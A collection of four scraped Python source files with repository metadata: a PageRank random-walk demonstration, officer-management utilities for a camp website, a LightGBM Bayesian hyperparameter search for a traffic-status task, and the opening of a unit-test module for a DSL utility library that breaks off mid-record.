+{"seq_id": "34065835829", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[10]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\nimport operator\nG=nx.gnp_random_graph(10,0.5,directed=True) #.5 for edge creation prob.\nnx.draw(G,with_labels= True)\nplt.show()\nx=random.choice([i for i in range(G.number_of_nodes())]) #random source node\ndict_counter={}\nfor i in range(G.number_of_nodes()):\n dict_counter[i]=0\ndict_counter[x]=dict_counter[x]+1\nfor i in range(1000000): #we iterate here and wait for convergence of the points distributed\n list_n= list(G.neighbors(x))\n if(len(list_n)==0): #if x is a sink (no neighbors)\n x=random.choice([i for i in range(G.number_of_nodes())])\n dict_counter[x]=dict_counter[x]+1\n else:\n x=random.choice(list_n)\n dict_counter[x]=dict_counter[x]+1\np=nx.pagerank(G)\nsorted_p= sorted(p.items(), key= operator.itemgetter(1))\nsorted_rw= sorted(dict_counter.items(), key= operator.itemgetter(1))\nprint(sorted_p)\nprint(sorted_rw)\n#we now check that the two rankings come out in the same order (e.g. 5 -> 3 -> ...); otherwise increase the iterations\n\n\n# In[25]:\n\n\nimport networkx as nx\nimport random\nimport matplotlib.pyplot as plt\n\ndef add_edges():\n nodes= list(G.nodes())\n for s in nodes:\n for t in nodes:\n if s != t:\n r=random.random()\n if r<0.5:\n G.add_edge(s,t)\n return G\n\ndef ap(G):\n nodes= list(G.nodes())\n p=[]\n for each in nodes:\n p.append(100) #we assign 100 points to each node \n return p\n\ndef distribute_points(G, points):\n nodes= list(G.nodes())\n new_points=[]\n for i in range(len(nodes)):\n new_points.append(0)\n for n in nodes:\n out=list(G.out_edges(n))\n if(len(out)==0):\n new_points[n]= new_points[n]+points[n] #a sink keeps its own points\n else:\n share= points[n]/len(out)\n for(src, tgt) in out:\n new_points[tgt]= new_points[tgt]+share\n return new_points\n \ndef keep_distributing(points, G):\n while(1):\n new_points= distribute_points(G, points)\n print(new_points)\n points= new_points\n stop=input(\"press n to stop or any other key to continue\")\n if stop==\"n\":\n break\n else:\n continue\n return new_points\n \ndef rank_by_points(final_points):\n d={}\n for i in range(len(final_points)):\n d[i]= final_points[i]\n print(sorted(d.items(), key=lambda f:f[1]))\n \nG=nx.DiGraph() # a directed graph\nG.add_nodes_from([i for i in range(10)])\nG=add_edges()\nnx.draw(G,with_labels= True)\nplt.show()\n#assign points\npoints= ap(G)\n#distribute // convergence\nfinal_points= keep_distributing(points, G)\n#rank by points\nrank_by_points(final_points)\nprint(\"now compare it\")\nresult= nx.pagerank(G)\nprint(sorted(result.items(), key=lambda f:f[1]))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "hitiksaini/google-pagerank-algorithm", "sub_path": "How does Google Work.py", "file_name": "How does Google Work.py", "file_ext": "py", "file_size_in_byte": 2822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "networkx.gnp_random_graph", "line_number": 11, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "networkx.pagerank", "line_number": 27, "usage_type": "call"}, {"api_name": 
"operator.itemgetter", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 29, "usage_type": "call"}, {"api_name": "random.random", "line_number": 47, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 92, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "networkx.pagerank", "line_number": 104, "usage_type": "call"}]}
+{"seq_id": "70235012328", "text": "\"\"\"\nUtility functions for officers app.\n\"\"\"\nfrom collections import defaultdict\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.models import Camp\nfrom cciw.utils.spreadsheet import ExcelSimpleBuilder\n\n\ndef camp_officer_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns complete list of officers for a camp\n \"\"\"\n return list(camp.officers.all().order_by(\"first_name\", \"last_name\", \"email\"))\n\n\ndef camp_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns list of officers who have not filled out an application form\n \"\"\"\n from cciw.officers.applications import applications_for_camp\n\n finished_apps_ids = applications_for_camp(camp).values_list(\"officer__id\", flat=True)\n return list(camp.officers.order_by(\"first_name\", \"last_name\", \"email\").exclude(id__in=finished_apps_ids))\n\n\ndef camp_serious_slacker_list(camp: Camp) -> list[User]:\n \"\"\"\n Returns a list of officers who have serious problems in terms\n of submitted applications and references.\n \"\"\"\n # This looks at history - so we find officers who have been on camps before.\n # We also look across all the camps, to catch officers who might go from one\n # camp to the next, never submitting application forms or references. This\n # means the logic is slightly different than 'applications_for_camp', but as\n # this is meant as a warning system it doesn't matter that it doesn't match\n # the logic exactly.\n\n from cciw.cciwmain.models import Camp\n from cciw.officers.models import Application, DBSCheck, Invitation, Reference\n\n officers = [i.officer for i in camp.invitations.all()]\n # We need to allow applications/references for the current year to 'fix' a\n # track record. However, when displaying past problems, don't include the\n # current year.\n relevant_camps = list(Camp.objects.filter(year__lte=camp.start_date.year).order_by(\"-start_date\"))\n\n if len(relevant_camps) == 0:\n return []\n\n latest_camp = relevant_camps[0]\n\n all_invitations = list(\n Invitation.objects.filter(camp__in=relevant_camps, officer__in=officers).select_related(\"camp\", \"officer\")\n )\n all_apps = list(\n Application.objects.filter(finished=True, officer__in=officers, date_saved__lte=latest_camp.start_date)\n )\n\n all_received_refs = list(Reference.objects.select_related(\"referee\").filter(referee__application__in=all_apps))\n\n all_dbss = list(DBSCheck.objects.filter(officer__in=officers))\n\n received_ref_dict = defaultdict(list)\n for ref in all_received_refs:\n received_ref_dict[ref.referee.application_id].append(ref)\n\n # For each officer, we need to build a list of the years when they were on\n # camp but failed to submit an application form.\n\n # If they failed to submit two references, we also need to show them. 
(If\n # they didn't submit an application form then they will definitely have\n # missing references).\n\n # Dictionaries containing officers as key, and a list of camps as values:\n officer_apps_missing = defaultdict(list)\n officer_apps_present = defaultdict(list)\n officer_refs_missing = defaultdict(list)\n officer_refs_present = defaultdict(list)\n officer_dbss_missing = defaultdict(list)\n officer_dbss_present = defaultdict(list)\n officer_apps_last_good_year = {}\n officer_refs_last_good_year = {}\n officer_dbss_last_good_year = {}\n\n for c in relevant_camps:\n camp_officers = {i.officer for i in all_invitations if i.camp == c}\n camp_applications = [a for a in all_apps if a.could_be_for_camp(c)]\n officers_with_applications = {a.officer for a in camp_applications}\n officers_with_two_references = {a.officer for a in camp_applications if len(received_ref_dict[a.id]) >= 2}\n officers_with_dbss = {dbs.officer for dbs in all_dbss if dbs.could_be_for_camp(c)}\n\n for o in camp_officers:\n if o in officers_with_applications:\n officer_apps_present[o].append(c)\n else:\n officer_apps_missing[o].append(c)\n if o in officers_with_two_references:\n officer_refs_present[o].append(c)\n else:\n officer_refs_missing[o].append(c)\n if o in officers_with_dbss:\n officer_dbss_present[o].append(c)\n else:\n officer_dbss_missing[o].append(c)\n\n # We only care about missing applications if they are not\n # followed by submitted applications i.e. an officer fixes\n # their past record by submitting one application.\n\n def sort_camps(camps):\n camps.sort(key=lambda camp: camp.start_date)\n\n def sort_camps_reverse(camps):\n camps.sort(key=lambda camp: camp.start_date, reverse=True)\n\n def get_missing_and_present_lists(present_dict, missing_dict, last_good_year_dict):\n for officer, camps in present_dict.items():\n if camps:\n sort_camps(camps)\n last_camp_with_item = camps[-1]\n missing_camps = missing_dict[officer]\n new_missing_camps = [c for c in missing_camps if c.start_date > last_camp_with_item.start_date]\n missing_dict[officer] = new_missing_camps\n last_good_year_dict[officer] = last_camp_with_item.year\n\n for officer, camps in missing_dict.items():\n sort_camps_reverse(camps)\n\n # Don't show missing applications/references from current year\n for officer, camps in missing_dict.items():\n missing_dict[officer] = [c for c in camps if c.year < camp.year]\n\n get_missing_and_present_lists(officer_apps_present, officer_apps_missing, officer_apps_last_good_year)\n get_missing_and_present_lists(officer_refs_present, officer_refs_missing, officer_refs_last_good_year)\n get_missing_and_present_lists(officer_dbss_present, officer_dbss_missing, officer_dbss_last_good_year)\n\n tmp1 = [\n (o, officer_apps_missing[o], officer_refs_missing[o], officer_dbss_missing[o])\n for o in (\n set(officer_apps_missing.keys()) | set(officer_refs_missing.keys()) | set(officer_dbss_missing.keys())\n )\n ]\n # Remove empty items:\n tmp1 = [(o, a, r, c) for (o, a, r, c) in tmp1 if len(a) > 0 or len(r) > 0 or len(c) > 0]\n return [\n {\n \"officer\": o,\n \"missing_application_forms\": a,\n \"missing_references\": r,\n \"missing_dbss\": c,\n \"last_good_apps_year\": officer_apps_last_good_year.get(o),\n \"last_good_refs_year\": officer_refs_last_good_year.get(o),\n \"last_good_dbss_year\": officer_dbss_last_good_year.get(o),\n }\n for o, a, r, c in tmp1\n ]\n\n\ndef officer_data_to_spreadsheet(camp: Camp):\n spreadsheet = ExcelSimpleBuilder()\n # Import here to avoid import cycle\n from cciw.officers.applications 
import applications_for_camp\n\n # All the data we need:\n invites = (\n camp.invitations.all().select_related(\"officer\", \"role\").order_by(\"officer__first_name\", \"officer__last_name\")\n )\n apps = applications_for_camp(camp).prefetch_related(\"qualifications\")\n app_dict = {app.officer.id: app for app in apps}\n\n # Attributes we need\n app_attr_getter = lambda attr: lambda user, inv, app: getattr(app, attr) if app is not None else \"\"\n columns = [\n (\"First name\", lambda u, inv, app: u.first_name),\n (\"Last name\", lambda u, inv, app: u.last_name),\n (\"Email\", lambda u, inv, app: u.email),\n (\"Role\", lambda u, inv, app: inv.role.name if inv.role else \"\"),\n (\"Address\", app_attr_getter(\"address_firstline\")),\n (\"Town\", app_attr_getter(\"address_town\")),\n (\"County\", app_attr_getter(\"address_county\")),\n (\"Post code\", app_attr_getter(\"address_postcode\")),\n (\"Country\", app_attr_getter(\"address_country\")),\n (\"Tel\", app_attr_getter(\"address_tel\")),\n (\"Mobile\", app_attr_getter(\"address_mobile\")),\n (\"Birth date\", app_attr_getter(\"birth_date\")),\n ]\n\n header_row = [h for h, f in columns]\n\n def data_rows():\n for inv in invites:\n user = inv.officer\n app = app_dict.get(user.id)\n row = []\n for header, f in columns:\n row.append(f(user, inv, app))\n yield row\n\n spreadsheet.add_sheet_with_header_row(\"Officers\", header_row, data_rows())\n\n # Qualifications sheet\n spreadsheet.add_sheet_with_header_row(\n \"Qualifications\",\n [\"First name\", \"Last name\", \"Qualification\", \"Date issued\"],\n [\n [a.officer.first_name, a.officer.last_name, q.type.name, q.date_issued]\n for a in apps\n for q in a.qualifications.all()\n ],\n )\n\n spreadsheet.add_sheet_with_header_row(\n \"Dietary Requirements\",\n [\"First name\", \"Last name\", \"Requirements\"],\n [[a.officer.first_name, a.officer.last_name, a.dietary_requirements] for a in apps if a.dietary_requirements],\n )\n return spreadsheet\n", "repo_name": "cciw-uk/cciw.co.uk", "sub_path": "cciw/officers/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 8987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cciw.cciwmain.models.Camp", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.accounts.models.User", "line_number": 11, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 24, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "cciw.cciwmain.models.Camp.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 47, "usage_type": "name"}, {"api_name": "cciw.officers.models.Invitation.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "cciw.officers.models.Invitation.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Invitation", "line_number": 55, "usage_type": "name"}, {"api_name": "cciw.officers.models.Application.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "cciw.officers.models.Application.objects", "line_number": 58, "usage_type": "attribute"}, 
{"api_name": "cciw.officers.models.Application", "line_number": 58, "usage_type": "name"}, {"api_name": "cciw.officers.models.Reference.objects.select_related", "line_number": 61, "usage_type": "call"}, {"api_name": "cciw.officers.models.Reference.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.Reference", "line_number": 61, "usage_type": "name"}, {"api_name": "cciw.officers.models.DBSCheck.objects.filter", "line_number": 63, "usage_type": "call"}, {"api_name": "cciw.officers.models.DBSCheck.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cciw.officers.models.DBSCheck", "line_number": 63, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 78, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 80, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 82, "usage_type": "call"}, {"api_name": "cciw.accounts.models.User", "line_number": 28, "usage_type": "name"}, {"api_name": "cciw.cciwmain.models.Camp", "line_number": 161, "usage_type": "name"}, {"api_name": "cciw.utils.spreadsheet.ExcelSimpleBuilder", "line_number": 162, "usage_type": "call"}, {"api_name": "cciw.officers.applications.applications_for_camp", "line_number": 170, "usage_type": "call"}]}
+{"seq_id": "28695557447", "text": "import numpy as np\r\nimport pandas as pd\r\nimport xgboost as xgb\r\nimport lightgbm\r\nfrom sklearn.model_selection import StratifiedKFold, KFold\r\nfrom sklearn.metrics import f1_score, log_loss\r\nfrom bayes_opt import BayesianOptimization\r\n\"\"\" ====================== Function definitions ========================== \"\"\"\r\ndef BayesianSearch(clf, params):\r\n \"\"\"贝叶斯优化器\"\"\"\r\n # 迭代次数\r\n num_iter = 25\r\n init_points = 5\r\n # 创建一个贝叶斯优化对象,输入为自定义的模型评估函数与超参数的范围\r\n bayes = BayesianOptimization(clf, params)\r\n # 开始优化\r\n bayes.maximize(init_points=init_points, n_iter=num_iter)\r\n # 输出结果\r\n params = bayes.res['max']\r\n print(params['max_params'])\r\n \r\n return params\r\n\r\ndef GBM_evaluate(min_child_samples, min_child_weight, colsample_bytree, max_depth, subsample, reg_alpha, reg_lambda):\r\n \"\"\"自定义的模型评估函数\"\"\"\r\n\r\n # 模型固定的超参数\r\n param = {\r\n 'objective': 'regression',\r\n 'n_estimators': 275,\r\n 'metric': 'rmse',\r\n 'random_state': 2020}\r\n\r\n # 贝叶斯优化器生成的超参数\r\n param['min_child_weight'] = int(min_child_weight)\r\n param['colsample_bytree'] = float(colsample_bytree),\r\n param['max_depth'] = int(max_depth),\r\n param['subsample'] = float(subsample),\r\n param['reg_lambda'] = float(reg_lambda),\r\n param['reg_alpha'] = float(reg_alpha),\r\n param['min_child_samples'] = int(min_child_samples)\r\n\r\n # 5-flod 交叉检验,注意BayesianOptimization会向最大评估值的方向优化,因此对于回归任务需要取负数。\r\n # 这里的评估函数为neg_mean_squared_error,即负的MSE。\r\n val = cross_val_score(lgb.LGBMRegressor(**param),\r\n train_X, train_y ,scoring='neg_mean_squared_error', cv=5).mean()\r\n\r\n return val\r\n\r\ndef LGB(params, train_x, train_y):\r\n predictors = list(train_x.columns)\r\n train_x = train_x.values\r\n folds = 5\r\n seed = 202\r\n kf = StratifiedKFold(n_splits = folds, shuffle = True, random_state = seed)\r\n #kf = KFold(n_splits = folds, shuffle = True, random_state = seed)\r\n train = np.zeros((train_x.shape[0], 3))\r\n test = np.zeros((test_x.shape[0], 3))\r\n test_pre = np.zeros((folds, test_x.shape[0], 3))\r\n test_pre_all = np.zeros((folds, test_x.shape[0]))\r\n cv_scores = []\r\n f1_scores = []\r\n cv_rounds = []\r\n\r\n for i, (train_index, verify_index) in enumerate(kf.split(train_x, train_y)):\r\n tr_x = train_x[train_index]\r\n tr_y = train_y[train_index]\r\n ve_x = train_x[verify_index]\r\n ve_y = train_y[verify_index]\r\n\r\n train_matrix = lightgbm.Dataset(tr_x, label = tr_y)\r\n verify_matrix = lightgbm.Dataset(ve_x, label = ve_y)\r\n\r\n num_round = 6000\r\n early_stopping_rounds = 1000\r\n if verify_matrix:\r\n model = lightgbm.train(params, train_matrix, num_round, \r\n valid_sets = verify_matrix, \r\n verbose_eval = 50,\r\n early_stopping_rounds = early_stopping_rounds\r\n )\r\n verify_res = model.predict(ve_x, \r\n num_iteration = model.best_iteration\r\n )\r\n pred = model.predict(test_x, num_iteration = model.best_iteration)\r\n train[verify_index] = verify_res\r\n test_pre[i, :] = pred\r\n pre_y = np.argmax(verify_res, axis = 1)\r\n f1_list = f1_score(ve_y, pre_y, average = None)\r\n f1 = 0.2*f1_list[0] + 0.2*f1_list[1] + 0.6*f1_list[2]\r\n \r\n f1_scores.append(f1)\r\n test_pre_all[i, :] = np.argmax(pred, axis=1)\r\n\r\n f1_mean = np.mean(f1_scores)\r\n\r\n return f1_mean\r\n\r\ndef lgb_cv(feature_fraction,bagging_fraction,bagging_freq,learning_rate,num_leaves,min_child_weight,\r\n min_data_in_leaf,max_depth,min_split_gain,lambda_l2,num_iterations=5000):\r\n params = {\r\n 'boosting_type': 'gbdt',\r\n 'objective':'multiclass',\r\n 
'metric':'multi_logloss',\r\n 'nthread': 6,'num_class':3,'verbose': -1,}\r\n\r\n params['min_child_weight'] = max(min_child_weight, 0)\r\n params[\"num_leaves\"] = int(round(num_leaves))\r\n params['lambda_l2'] = max(lambda_l2, 0)\r\n params['feature_fraction'] = max(min(feature_fraction, 1), 0)\r\n params['bagging_fraction'] = max(min(bagging_fraction, 1), 0)\r\n params['bagging_freq'] = int(round(bagging_freq))\r\n params['learning_rate'] = max(min(learning_rate, 1), 0)\r\n params[\"min_data_in_leaf\"] = int(round(min_data_in_leaf))\r\n params['max_depth'] = int(round(max_depth))\r\n params['min_split_gain'] = min_split_gain\r\n \r\n f1_result = LGB(params, train_x, train_y)\r\n return f1_result\r\n\r\n\"\"\" ======================= Load Training Data ======================= \"\"\"\r\npath = \"I:/TianChi/data/\" #存放数据的地址\r\nresult_path = \"I:/TianChi/data/\" #存放数据的地址\r\ntrain_json = pd.read_json(path + \"train_target.json\")\r\ntest_json = pd.read_json(path + \"test_target.json\")\r\n\r\ntrain_features = pd.read_csv(path + 'train_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntest_features = pd.read_csv(path + 'test_feature3000_rate0.5_w3_tr0.5_new.csv')\r\ntrain_df = pd.read_csv(path + 'train_feature3000_timecn_new.csv')\r\ntest_df = pd.read_csv(path + 'test_feature3000_timecn_new.csv')\r\nX = pd.read_csv(path + 'train_feature3000_fromJ.csv')\r\nX_test = pd.read_csv(path + 'test_feature3000_fromJ.csv')\r\n\r\n\"\"\" ====================== Variable Declaration ========================== \"\"\"\r\nselect_features = [\r\n \"rate1_mean\",\r\n \"rate1_std\",\r\n \"rate2_mean\",\r\n \"rate2_std\",\r\n \"number1_mean\",\r\n \"number1_std\",\r\n \"number2_mean\",\r\n \"number2_std\",\r\n 'square_mean', \r\n 'square_std',\r\n #'number_mean', \r\n #'number_std',\r\n 'car1_mean',\r\n 'car2_mean',\r\n 'truck1_mean',\r\n 'truck2_mean',\r\n #'bus1_mean',\r\n #'bus2_mean',\r\n #'motorbike1_mean',\r\n #'motorbike2_mean',\r\n #'bicycle1_mean',\r\n #'bicycle2_mean',\r\n \"gap_mean\",\r\n \"gap_std\",\r\n \"hour_mean\",\r\n \"minute_mean\",\r\n \"dayofweek_mean\",\r\n \"gap_time_today_mean\",\r\n \"gap_time_today_std\",\r\n '1','2','3',\r\n #\"im_diff_mean_mean\",\"im_diff_mean_std\",\"im_diff_std_mean\",\"im_diff_std_std\",\r\n ]\r\n\r\ntrain_features['number1'] = train_features['car1'] + train_features['truck1'] + train_features['bus1'] + train_features['motorbike1'] + train_features['bicycle1']\r\ntrain_features['number2'] = train_features['car2'] + train_features['truck2'] + train_features['bus2'] + train_features['motorbike2'] + train_features['bicycle2']\r\ntest_features['number1'] = test_features['car1'] + test_features['truck1'] + test_features['bus1'] + test_features['motorbike1'] + test_features['bicycle1']\r\ntest_features['number2'] = test_features['car2'] + test_features['truck2'] + test_features['bus2'] + test_features['motorbike2'] + test_features['bicycle2']\r\n\r\ntrain_features['square'] = train_features['rate1'] + train_features['rate2']\r\ntest_features['square'] = test_features['rate1'] + test_features['rate2']\r\ntrain_features['number'] = train_features['number1'] + train_features['number2']\r\ntest_features['number'] = test_features['number1'] + test_features['number2']\r\n\r\ntrain_features = train_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 
'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\n\r\ntest_features = test_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\ntrain_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n #'1','2','3','4','5','6','7','8','9','10','11',\r\n \"label\"]\r\ntest_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n \"label\"]\r\n'''\r\ntrain_df = get_data(train_json[:],\"amap_traffic_train_0712\")\r\ntest_df = get_data(test_json[:],\"amap_traffic_test_0712\")\r\ntest_df.to_csv(path_or_buf = path + 'test_feature_timecn_new.csv')\r\ntrain_df.to_csv(path_or_buf = path + 'train_feature_timecn_new.csv')\r\n'''\r\n\r\ntrain_features = pd.concat([train_features, train_df, X], axis = 1)\r\ntest_features = pd.concat([test_features, test_df, X_test], axis = 1)\r\n\r\ntrain_features[\"label\"] = train_features[\"label\"].apply(int)\r\ntest_features[\"label\"] = test_features[\"label\"].apply(int)\r\n\r\n\r\ntrain_x = train_features[select_features].copy()\r\ntrain_y = train_features[\"label\"]\r\ntest_x = test_features[select_features].copy()\r\n\r\n\"\"\" ====================== Random Search ========================== \"\"\"\r\nbounds = {\r\n 'min_child_weight': (1,10),\r\n 'num_leaves': (8, 150),\r\n 'lambda_l2': (0, 50),\r\n #'lambda_l1': (0, 50),\r\n 'feature_fraction': (0.2, 1),\r\n 'bagging_fraction': (0.2, 1),\r\n 'bagging_freq': (1, 100),\r\n 'learning_rate': (0.01, 1),\r\n 'min_data_in_leaf': (1,20),\r\n 'max_depth': (3, 30),\r\n 'min_split_gain': (0, 50),\r\n \r\n }\r\nlgb_bo = BayesianOptimization(lgb_cv, bounds, random_state = 1111)\r\n\r\nlgb_bo.maximize(init_points = 10, n_iter = 100)\r\nbest = lgb_bo.max\r\na = 0", "repo_name": "liuzexi256/GaodeMAP", "sub_path": "BayesOpt.py", "file_name": "BayesOpt.py", "file_ext": "py", "file_size_in_byte": 12329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bayes_opt.BayesianOptimization", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 
59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 71, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 72, "usage_type": "call"}, {"api_name": "lightgbm.train", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 225, "usage_type": "call"}, {"api_name": "bayes_opt.BayesianOptimization", "line_number": 250, "usage_type": "call"}]}
+{"seq_id": "9987164383", "text": "# -*- coding: utf-8 -*-\n#! \\file ./tests/test_support/test_utils.py\n#! \\author Jiří Kučera, \n#! \\stamp 2014-04-10 20:58:24 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nDoIt! utilities tests.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport time\nimport unittest\n\nfrom ..common import RAISE_FROM_ENTER, SUPRESS, ContextManagerMock, \\\n ModuleContext\n\nfrom doit.support.errors import DoItAssertionError\n\nfrom doit.support.utils import \\\n ordinal_suffix, deep_eq, timestamp, \\\n Functor, WithStatementExceptionHandler, Collection\n\nclass Struct(object):\n __slots__ = [ '__kwargs' ]\n\n def __init__(self, **kwargs):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n setattr(self, _('__kwargs'), kwargs)\n #-def\n\n def __getattr__(self, value):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n kwargs = object.__getattribute__(self, _('__kwargs'))\n if value in kwargs:\n return kwargs[value]\n object.__getattribute__(self, value)\n #-def\n#-class\n\nclass TimeModuleMock(ModuleContext):\n __slots__ = [\n '__old_localtime',\n '__old_timezone'\n ]\n\n def __init__(self, env):\n ModuleContext.__init__(self, env)\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n #-def\n\n def replace(self, env):\n def _localtime():\n return Struct(\n tm_year = env['year'],\n tm_mon = env['month'],\n tm_mday = env['day'],\n tm_hour = env['hour'],\n tm_min = env['min'],\n tm_sec = env['sec'],\n tm_isdst = env['isdst']\n )\n self.__old_localtime 